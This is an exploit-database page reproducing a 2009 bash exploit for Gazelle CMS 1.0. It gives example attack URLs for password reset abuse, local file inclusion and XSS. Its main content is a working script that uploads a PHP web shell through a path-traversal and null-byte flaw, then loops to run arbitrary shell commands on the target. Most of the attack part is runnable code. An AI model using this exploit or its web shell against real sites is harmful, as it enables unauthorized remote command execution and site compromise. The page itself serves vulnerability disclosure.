Gazelle CMS 1.0 Multiple Vulnerabilities / RCE Exploit

2009-09-15 / 2009-09-16
Credit: mr_me
Risk: High
Local: No
Remote: Yes

#!/bin/bash # Gazelle CMS 1.0 Multiple Vulnerabilities # Script Download: http://www.anantasoft.com/index.php?Gazelle%20CMS/Download # Found by white_sheep on 11/08/2009 # Contact: sheewhite@googlemail.com - https://www.ihteam.net # Need magic_quote_gpc Off for RCE and LFI # Thanks to R00T[ATI] # # PASSWORD RESET: # http://localhost/gazelle/renew.php?user=[username] # # LFI: # http://localhost/gazelle/index.php?template=[LFI] # # XSS: # http://localhost/gazelle/user.php?user=</title>[XSS] # http://localhost/gazelle/search.php?lookup=<script+type="text/javascript">[CODE]</script> # # RCE: echo echo "###############################################" echo "# GazelleCMS 1.0 RCE #" echo "# by white_sheep #" echo "# sheewhite[at]googlemail[dot]com #" echo "# #" echo "# https://www.ihteam.net #" echo "###############################################" echo EVILC='<?php passthru($_GET[cmd]); ?>' echo -n "Insert url with path (ex.: http://localhost/gazelle): " read SITE PAGENAME=/modules/menu$RANDOM'.bak.php' curl -F "siteTitle='INIT'$EVILC'EOF';type=text/html" $SITE'/admin/settemplate.php?customizetemplate=..'$PAGENAME'%00' 1>/dev/null 2>/dev/null if [ "`curl -s $SITE''$PAGENAME | grep siteTitle`" == "" ] then echo "[-] Not Vulnerable :( byee" exit fi while true do echo -n "sh$: " read -r CMD CMD=`echo $CMD | sed 's/ /+/g'` echo $CMD curl -s "$SITE$PAGENAME?cmd=$CMD" | sed "s/.*'INIT'//g;s/'EOF'.*//g" echo done

References:

http://www.milw0rm.com/exploits/9425
http://secunia.com/advisories/33686


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top